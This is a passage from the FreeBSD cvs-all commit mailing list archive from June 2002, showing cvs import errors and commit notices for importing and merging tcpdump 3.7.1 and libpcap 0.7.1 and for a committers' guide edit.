/home/ncvs/contrib/tcpdump/print-egp.c,v: No such file or directory N contrib/tcpdump/print-esp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-esp.c,v: No such file or directory N contrib/tcpdump/print-ether.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ether.c,v: No such file or directory N contrib/tcpdump/print-fddi.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-fddi.c,v: No such file or directory N contrib/tcpdump/print-frag6.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-frag6.c,v: No such file or directory N contrib/tcpdump/print-gre.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-gre.c,v: No such file or directory N contrib/tcpdump/print-hsrp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-hsrp.c,v: No such file or directory N contrib/tcpdump/print-icmp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-icmp.c,v: No such file or directory N contrib/tcpdump/print-icmp6.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-icmp6.c,v: No such file or directory N contrib/tcpdump/print-igmp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-igmp.c,v: No such file or directory N contrib/tcpdump/print-igrp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-igrp.c,v: No such file or directory N contrib/tcpdump/print-ip.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ip.c,v: No such file or directory N contrib/tcpdump/print-ip6.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ip6.c,v: No such file or directory N contrib/tcpdump/print-ip6opts.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ip6opts.c,v: No such file or directory N contrib/tcpdump/print-ipcomp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ipcomp.c,v: No such file or directory N contrib/tcpdump/print-ipx.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ipx.c,v: No such file or directory N contrib/tcpdump/print-isakmp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-isakmp.c,v: No such file or directory N contrib/tcpdump/print-isoclns.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-isoclns.c,v: No such file or directory N contrib/tcpdump/print-krb.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-krb.c,v: No such file or directory N contrib/tcpdump/print-l2tp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-l2tp.c,v: No such file or directory N contrib/tcpdump/print-lane.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-lane.c,v: No such file or directory N contrib/tcpdump/print-lcp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-lcp.c,v: No such file or directory N contrib/tcpdump/print-llc.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-llc.c,v: No such file or directory N contrib/tcpdump/print-lwres.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-lwres.c,v: No such file or directory N contrib/tcpdump/print-mobile.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-mobile.c,v: No such file or directory N contrib/tcpdump/print-mpls.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-mpls.c,v: No such file or directory N contrib/tcpdump/print-msdp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-msdp.c,v: No such file or directory N contrib/tcpdump/print-netbios.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-netbios.c,v: No such file or directory N contrib/tcpdump/print-nfs.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-nfs.c,v: No such file or directory N contrib/tcpdump/print-ntp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ntp.c,v: No such file or directory N contrib/tcpdump/print-null.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-null.c,v: No such file or directory N contrib/tcpdump/print-ospf.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ospf.c,v: No such file or directory N contrib/tcpdump/print-ospf6.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ospf6.c,v: No such file or directory N contrib/tcpdump/print-pim.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-pim.c,v: No such file or directory N contrib/tcpdump/print-ppp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ppp.c,v: No such file or directory N contrib/tcpdump/print-pppoe.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-pppoe.c,v: No such file or directory N contrib/tcpdump/rx.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/rx.h,v: No such file or directory N contrib/tcpdump/print-pptp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-pptp.c,v: No such file or directory N contrib/tcpdump/print-radius.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-radius.c,v: No such file or directory N contrib/tcpdump/print-raw.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-raw.c,v: No such file or directory N contrib/tcpdump/print-rip.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-rip.c,v: No such file or directory N contrib/tcpdump/print-ripng.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ripng.c,v: No such file or directory N contrib/tcpdump/print-rt6.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-rt6.c,v: No such file or directory N contrib/tcpdump/print-rx.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-rx.c,v: No such file or directory N contrib/tcpdump/print-sctp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-sctp.c,v: No such file or directory N contrib/tcpdump/print-sl.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-sl.c,v: No such file or directory N contrib/tcpdump/print-sll.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-sll.c,v: No such file or directory N contrib/tcpdump/print-smb.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-smb.c,v: No such file or directory N contrib/tcpdump/print-snmp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-snmp.c,v: No such file or directory N contrib/tcpdump/print-stp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-stp.c,v: No such file or directory N contrib/tcpdump/print-sunrpc.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-sunrpc.c,v: No such file or directory N contrib/tcpdump/print-tcp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-tcp.c,v: No such file or directory N contrib/tcpdump/print-telnet.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-telnet.c,v: No such file or directory N contrib/tcpdump/print-tftp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-tftp.c,v: No such file or directory N contrib/tcpdump/print-timed.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-timed.c,v: No such file or directory N contrib/tcpdump/print-token.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-token.c,v: No such file or directory N contrib/tcpdump/print-udp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-udp.c,v: No such file or directory N contrib/tcpdump/print-vjc.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-vjc.c,v: No such file or directory N contrib/tcpdump/print-vrrp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-vrrp.c,v: No such file or directory N contrib/tcpdump/print-wb.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-wb.c,v: No such file or directory N contrib/tcpdump/print-zephyr.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-zephyr.c,v: No such file or directory N contrib/tcpdump/route6d.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/route6d.h,v: No such file or directory N contrib/tcpdump/sctpConstants.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/sctpConstants.h,v: No such file or directory N contrib/tcpdump/sctpHeader.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/sctpHeader.h,v: No such file or directory N contrib/tcpdump/send-ack.awk cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/send-ack.awk,v: No such file or directory N contrib/tcpdump/setsignal.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/setsignal.c,v: No such file or directory N contrib/tcpdump/setsignal.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/setsignal.h,v: No such file or directory N contrib/tcpdump/slcompress.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/slcompress.h,v: No such file or directory N contrib/tcpdump/slip.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/slip.h,v: No such file or directory N contrib/tcpdump/sll.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/sll.h,v: No such file or directory N contrib/tcpdump/smb.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/smb.h,v: No such file or directory N contrib/tcpdump/smbutil.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/smbutil.c,v: No such file or directory N contrib/tcpdump/stime.awk cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/stime.awk,v: No such file or directory N contrib/tcpdump/strcasecmp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/strcasecmp.c,v: No such file or directory N contrib/tcpdump/tcp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/tcp.h,v: No such file or directory N contrib/tcpdump/tcpdump.1 cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/tcpdump.1,v: No such file or directory N contrib/tcpdump/tcpdump.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/tcpdump.c,v: No such file or directory N contrib/tcpdump/telnet.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/telnet.h,v: No such file or directory N contrib/tcpdump/timed.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/timed.h,v: No such file or directory N contrib/tcpdump/token.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/token.h,v: No such file or directory N contrib/tcpdump/udp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/udp.h,v: No such file or directory N contrib/tcpdump/util.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/util.c,v: No such file or directory N contrib/tcpdump/vfprintf.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/vfprintf.c,v: No such file or directory cvs: ERROR: cannot mkdir /home/ncvs/contrib/tcpdump/lbl -- not added: No such file or directory cvs: ERROR: cannot mkdir /home/ncvs/contrib/tcpdump/missing -- not added: No such file or directory No conflicts created by this import To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 17:45: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DB58937B499; Thu, 20 Jun 2002 17:43:42 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L0hc809753; Thu, 20 Jun 2002 17:43:38 -0700 (PDT) (envelope-from fenner) Message-Id: <200206210043.g5L0hc809753@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 17:43:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/tcpdump - Imported sources X-FreeBSD-CVS-Branch: TCPDUMP_ORG Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 17:43:28 PDT src/contrib/tcpdump - Imported sources Update of /home/ncvs/src/contrib/tcpdump In directory freefall.freebsd.org:/c/tmp/cvs-serv9739 Log Message: Import tcpdump 3.7.1, from http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz Status: Vendor Tag: TCPDUMP_ORG Release Tags: tcpdump_3_7_1 U src/contrib/tcpdump/.cvsignore U src/contrib/tcpdump/CHANGES U src/contrib/tcpdump/CREDITS U src/contrib/tcpdump/FILES U src/contrib/tcpdump/INSTALL U src/contrib/tcpdump/LICENSE U src/contrib/tcpdump/Makefile-devel-adds U src/contrib/tcpdump/Makefile.in U src/contrib/tcpdump/PLATFORMS U src/contrib/tcpdump/README U src/contrib/tcpdump/TODO U src/contrib/tcpdump/VERSION U src/contrib/tcpdump/acconfig.h C src/contrib/tcpdump/aclocal.m4 C src/contrib/tcpdump/addrtoname.c U src/contrib/tcpdump/addrtoname.h U src/contrib/tcpdump/ah.h U src/contrib/tcpdump/appletalk.h N src/contrib/tcpdump/arcnet.h U src/contrib/tcpdump/atime.awk U src/contrib/tcpdump/bootp.h U src/contrib/tcpdump/bpf_dump.c U src/contrib/tcpdump/chdlc.h U src/contrib/tcpdump/config.h.in U src/contrib/tcpdump/config.guess U src/contrib/tcpdump/config.sub U src/contrib/tcpdump/configure U src/contrib/tcpdump/configure.in U src/contrib/tcpdump/decnet.h U src/contrib/tcpdump/dhcp6.h U src/contrib/tcpdump/dhcp6opt.h U src/contrib/tcpdump/esp.h U src/contrib/tcpdump/ether.h C src/contrib/tcpdump/ethertype.h U src/contrib/tcpdump/extract.h U src/contrib/tcpdump/fddi.h U src/contrib/tcpdump/gmt2local.c U src/contrib/tcpdump/gmt2local.h U src/contrib/tcpdump/icmp6.h N src/contrib/tcpdump/ieee802_11.h U src/contrib/tcpdump/igrp.h U src/contrib/tcpdump/install-sh C src/contrib/tcpdump/interface.h U src/contrib/tcpdump/ip.h U src/contrib/tcpdump/ip6.h U src/contrib/tcpdump/ipsec_doi.h U src/contrib/tcpdump/ipx.h U src/contrib/tcpdump/isakmp.h U src/contrib/tcpdump/l2tp.h U src/contrib/tcpdump/lane.h U src/contrib/tcpdump/llc.h U src/contrib/tcpdump/machdep.c U src/contrib/tcpdump/machdep.h U src/contrib/tcpdump/makemib U src/contrib/tcpdump/mib.h U src/contrib/tcpdump/mkdep U src/contrib/tcpdump/nameser.h U src/contrib/tcpdump/netbios.h U src/contrib/tcpdump/nfs.h C src/contrib/tcpdump/nfsfh.h U src/contrib/tcpdump/ntp.h U src/contrib/tcpdump/oakley.h U src/contrib/tcpdump/ospf.h U src/contrib/tcpdump/ospf6.h U src/contrib/tcpdump/packetdat.awk C src/contrib/tcpdump/parsenfsfh.c C src/contrib/tcpdump/ppp.h N src/contrib/tcpdump/print-802_11.c U src/contrib/tcpdump/print-ah.c N src/contrib/tcpdump/print-arcnet.c C src/contrib/tcpdump/print-arp.c U src/contrib/tcpdump/print-ascii.c C src/contrib/tcpdump/print-atalk.c C src/contrib/tcpdump/print-atm.c N src/contrib/tcpdump/print-beep.c U src/contrib/tcpdump/print-bgp.c U src/contrib/tcpdump/print-cdp.c U src/contrib/tcpdump/print-cip.c C src/contrib/tcpdump/print-bootp.c U src/contrib/tcpdump/print-chdlc.c U src/contrib/tcpdump/print-cnfp.c U src/contrib/tcpdump/print-decnet.c U src/contrib/tcpdump/print-dhcp6.c C src/contrib/tcpdump/print-domain.c U src/contrib/tcpdump/print-dvmrp.c U src/contrib/tcpdump/print-egp.c U src/contrib/tcpdump/print-esp.c C src/contrib/tcpdump/print-ether.c C src/contrib/tcpdump/print-fddi.c U src/contrib/tcpdump/print-frag6.c U src/contrib/tcpdump/print-gre.c N src/contrib/tcpdump/print-hsrp.c C src/contrib/tcpdump/print-icmp.c U src/contrib/tcpdump/print-icmp6.c U src/contrib/tcpdump/print-igmp.c U src/contrib/tcpdump/print-igrp.c C src/contrib/tcpdump/print-ip.c C src/contrib/tcpdump/print-ip6.c U src/contrib/tcpdump/print-ip6opts.c U src/contrib/tcpdump/print-ipcomp.c C src/contrib/tcpdump/print-ipx.c U src/contrib/tcpdump/print-isakmp.c C src/contrib/tcpdump/print-isoclns.c U src/contrib/tcpdump/print-krb.c U src/contrib/tcpdump/print-l2tp.c U src/contrib/tcpdump/print-lane.c U src/contrib/tcpdump/print-lcp.c C src/contrib/tcpdump/print-llc.c N src/contrib/tcpdump/print-lwres.c U src/contrib/tcpdump/print-mobile.c N src/contrib/tcpdump/print-mpls.c N src/contrib/tcpdump/print-msdp.c U src/contrib/tcpdump/print-netbios.c C src/contrib/tcpdump/print-nfs.c C src/contrib/tcpdump/print-ntp.c C src/contrib/tcpdump/print-null.c U src/contrib/tcpdump/print-ospf.c U src/contrib/tcpdump/print-ospf6.c C src/contrib/tcpdump/print-pim.c C src/contrib/tcpdump/print-ppp.c U src/contrib/tcpdump/print-pppoe.c U src/contrib/tcpdump/rx.h N src/contrib/tcpdump/print-pptp.c U src/contrib/tcpdump/print-radius.c U src/contrib/tcpdump/print-raw.c U src/contrib/tcpdump/print-rip.c U src/contrib/tcpdump/print-ripng.c U src/contrib/tcpdump/print-rt6.c U src/contrib/tcpdump/print-rx.c N src/contrib/tcpdump/print-sctp.c C src/contrib/tcpdump/print-sl.c U src/contrib/tcpdump/print-sll.c U src/contrib/tcpdump/print-smb.c U src/contrib/tcpdump/print-snmp.c U src/contrib/tcpdump/print-stp.c U src/contrib/tcpdump/print-sunrpc.c U src/contrib/tcpdump/print-tcp.c U src/contrib/tcpdump/print-telnet.c U src/contrib/tcpdump/print-tftp.c U src/contrib/tcpdump/print-timed.c C src/contrib/tcpdump/print-token.c C src/contrib/tcpdump/print-udp.c U src/contrib/tcpdump/print-vjc.c U src/contrib/tcpdump/print-vrrp.c U src/contrib/tcpdump/print-wb.c N src/contrib/tcpdump/print-zephyr.c U src/contrib/tcpdump/route6d.h N src/contrib/tcpdump/sctpConstants.h N src/contrib/tcpdump/sctpHeader.h U src/contrib/tcpdump/send-ack.awk U src/contrib/tcpdump/setsignal.c U src/contrib/tcpdump/setsignal.h U src/contrib/tcpdump/slcompress.h U src/contrib/tcpdump/slip.h U src/contrib/tcpdump/sll.h U src/contrib/tcpdump/smb.h U src/contrib/tcpdump/smbutil.c U src/contrib/tcpdump/stime.awk U src/contrib/tcpdump/strcasecmp.c U src/contrib/tcpdump/tcp.h C src/contrib/tcpdump/tcpdump.1 C src/contrib/tcpdump/tcpdump.c N src/contrib/tcpdump/telnet.h U src/contrib/tcpdump/timed.h U src/contrib/tcpdump/token.h U src/contrib/tcpdump/udp.h U src/contrib/tcpdump/util.c U src/contrib/tcpdump/vfprintf.c U src/contrib/tcpdump/lbl/os-solaris2.h U src/contrib/tcpdump/lbl/os-sunos4.h U src/contrib/tcpdump/lbl/os-ultrix4.h U src/contrib/tcpdump/missing/addrinfo.h U src/contrib/tcpdump/missing/addrsize.h U src/contrib/tcpdump/missing/bittypes.h U src/contrib/tcpdump/missing/getaddrinfo.c U src/contrib/tcpdump/missing/getnameinfo.c U src/contrib/tcpdump/missing/inet_aton.c U src/contrib/tcpdump/missing/inet_ntop.c U src/contrib/tcpdump/missing/inet_pton.c U src/contrib/tcpdump/missing/resolv6.h U src/contrib/tcpdump/missing/resolv_ext.h U src/contrib/tcpdump/missing/snprintf.c U src/contrib/tcpdump/missing/sockstorage.h N src/contrib/tcpdump/missing/strdup.c U src/contrib/tcpdump/missing/strlcat.c U src/contrib/tcpdump/missing/strlcpy.c 30 conflicts created by this import. Use the following command to help the merge: cvs checkout -jTCPDUMP_ORG:yesterday -jTCPDUMP_ORG src/contrib/tcpdump To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 17:49:12 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 232B937B408; Thu, 20 Jun 2002 17:49:04 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L0n4g10221; Thu, 20 Jun 2002 17:49:04 -0700 (PDT) (envelope-from fenner) Message-Id: <200206210049.g5L0n4g10221@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 17:49:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/tcpdump addrtoname.c ethertype.h interface.h nfsfh.h parsenfsfh.c ppp.h print-arp.c print-atalk.c print-atm.c print-bootp.c print-domain.c print-ether.c print-fddi.c print-icmp.c print-ip.c print-ip6.c print-ipx.c ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 17:49:04 PDT Modified files: contrib/tcpdump addrtoname.c ethertype.h interface.h nfsfh.h parsenfsfh.c ppp.h print-arp.c print-atalk.c print-atm.c print-bootp.c print-domain.c print-ether.c print-fddi.c print-icmp.c print-ip.c print-ip6.c print-ipx.c print-isoclns.c print-llc.c print-nfs.c print-ntp.c print-null.c print-pim.c print-ppp.c print-sl.c print-token.c print-udp.c tcpdump.1 tcpdump.c token.h Log: Merge tcpdump 3.7.1 MFC after: 2 weeks Revision Changes Path 1.10 +146 -49 src/contrib/tcpdump/addrtoname.c 1.7 +13 -3 src/contrib/tcpdump/ethertype.h 1.7 +70 -39 src/contrib/tcpdump/interface.h 1.7 +38 -4 src/contrib/tcpdump/nfsfh.h 1.7 +39 -8 src/contrib/tcpdump/parsenfsfh.c 1.5 +3 -2 src/contrib/tcpdump/ppp.h 1.7 +45 -73 src/contrib/tcpdump/print-arp.c 1.10 +44 -11 src/contrib/tcpdump/print-atalk.c 1.8 +6 -2 src/contrib/tcpdump/print-atm.c 1.7 +130 -29 src/contrib/tcpdump/print-bootp.c 1.9 +137 -168 src/contrib/tcpdump/print-domain.c 1.12 +20 -3 src/contrib/tcpdump/print-ether.c 1.7 +11 -7 src/contrib/tcpdump/print-fddi.c 1.7 +15 -21 src/contrib/tcpdump/print-icmp.c 1.9 +36 -65 src/contrib/tcpdump/print-ip.c 1.4 +17 -14 src/contrib/tcpdump/print-ip6.c 1.6 +24 -15 src/contrib/tcpdump/print-ipx.c 1.10 +1148 -240 src/contrib/tcpdump/print-isoclns.c 1.8 +83 -28 src/contrib/tcpdump/print-llc.c 1.8 +4 -3 src/contrib/tcpdump/print-nfs.c 1.7 +3 -6 src/contrib/tcpdump/print-ntp.c 1.7 +6 -2 src/contrib/tcpdump/print-null.c 1.4 +291 -288 src/contrib/tcpdump/print-pim.c 1.12 +29 -13 src/contrib/tcpdump/print-ppp.c 1.7 +10 -2 src/contrib/tcpdump/print-sl.c 1.5 +134 -107 src/contrib/tcpdump/print-token.c 1.7 +39 -58 src/contrib/tcpdump/print-udp.c 1.11 +458 -199 src/contrib/tcpdump/tcpdump.1 1.6 +157 -21 src/contrib/tcpdump/tcpdump.c 1.3 +22 -28 src/contrib/tcpdump/token.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 17:52:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7917637B411; Thu, 20 Jun 2002 17:52:33 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L0qXC11028; Thu, 20 Jun 2002 17:52:33 -0700 (PDT) (envelope-from fenner) Message-Id: <200206210052.g5L0qXC11028@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 17:52:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/tcpdump/tcpdump Makefile config.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 17:52:33 PDT Modified files: usr.sbin/tcpdump/tcpdump Makefile config.h Log: Update for tcpdump 3.7.1 Revision Changes Path 1.34 +20 -20 src/usr.sbin/tcpdump/tcpdump/Makefile 1.3 +18 -29 src/usr.sbin/tcpdump/tcpdump/config.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 18:22:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B7F9037B40A; Thu, 20 Jun 2002 18:22:10 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L1MAb17706; Thu, 20 Jun 2002 18:22:10 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206210122.g5L1MAb17706@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 18:22:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/committers-guide article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 18:22:10 PDT Modified files: en_US.ISO8859-1/articles/committers-guide article.sgml Log: Point people to the cvs(1) manpage and ``cvs import'' rather than to the now obsolete/unused easy-import script. Reviewed by: fenner Revision Changes Path 1.127 +2 -6 doc/en_US.ISO8859-1/articles/committers-guide/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 18:35:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 01ECB37B404; Thu, 20 Jun 2002 18:35:38 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L1ZbT18743; Thu, 20 Jun 2002 18:35:37 -0700 (PDT) (envelope-from fenner) Message-Id: <200206210135.g5L1ZbT18743@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 18:35:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libpcap config.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 18:35:37 PDT Modified files: lib/libpcap config.h Log: Update for libpcap 0.7.1 Revision Changes Path 1.2 +23 -6 src/lib/libpcap/config.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 18:37:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E11D37B403; Thu, 20 Jun 2002 18:36:28 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L1aSZ18801; Thu, 20 Jun 2002 18:36:28 -0700 (PDT) (envelope-from fenner) Message-Id: <200206210136.g5L1aSZ18801@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 18:36:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/libpcap - Imported sources X-FreeBSD-CVS-Branch: TCPDUMP_ORG Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 18:36:28 PDT src/contrib/libpcap - Imported sources Update of /home/ncvs/src/contrib/libpcap In directory freefall.freebsd.org:/c/tmp/cvs-serv18779 Log Message: Import libpcap 0.7.1, from http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz Status: Vendor Tag: TCPDUMP_ORG Release Tags: libpcap_0_7_1 U src/contrib/libpcap/.cvsignore U src/contrib/libpcap/CHANGES U src/contrib/libpcap/CREDITS U src/contrib/libpcap/FILES N src/contrib/libpcap/INSTALL.txt U src/contrib/libpcap/LICENSE U src/contrib/libpcap/Makefile.in U src/contrib/libpcap/README U src/contrib/libpcap/README.aix U src/contrib/libpcap/README.linux N src/contrib/libpcap/README.tru64 U src/contrib/libpcap/TODO U src/contrib/libpcap/VERSION N src/contrib/libpcap/acconfig.h C src/contrib/libpcap/aclocal.m4 N src/contrib/libpcap/arcnet.h U src/contrib/libpcap/bpf_dump.c U src/contrib/libpcap/bpf_image.c U src/contrib/libpcap/config.guess U src/contrib/libpcap/config.h.in U src/contrib/libpcap/config.sub U src/contrib/libpcap/configure U src/contrib/libpcap/configure.in U src/contrib/libpcap/etherent.c U src/contrib/libpcap/ethertype.h C src/contrib/libpcap/gencode.c C src/contrib/libpcap/gencode.h C src/contrib/libpcap/grammar.y U src/contrib/libpcap/inet.c U src/contrib/libpcap/install-sh U src/contrib/libpcap/llc.h U src/contrib/libpcap/mkdep C src/contrib/libpcap/nametoaddr.c U src/contrib/libpcap/nlpid.h U src/contrib/libpcap/optimize.c U src/contrib/libpcap/pcap-bpf.c U src/contrib/libpcap/pcap-dlpi.c U src/contrib/libpcap/pcap-enet.c C 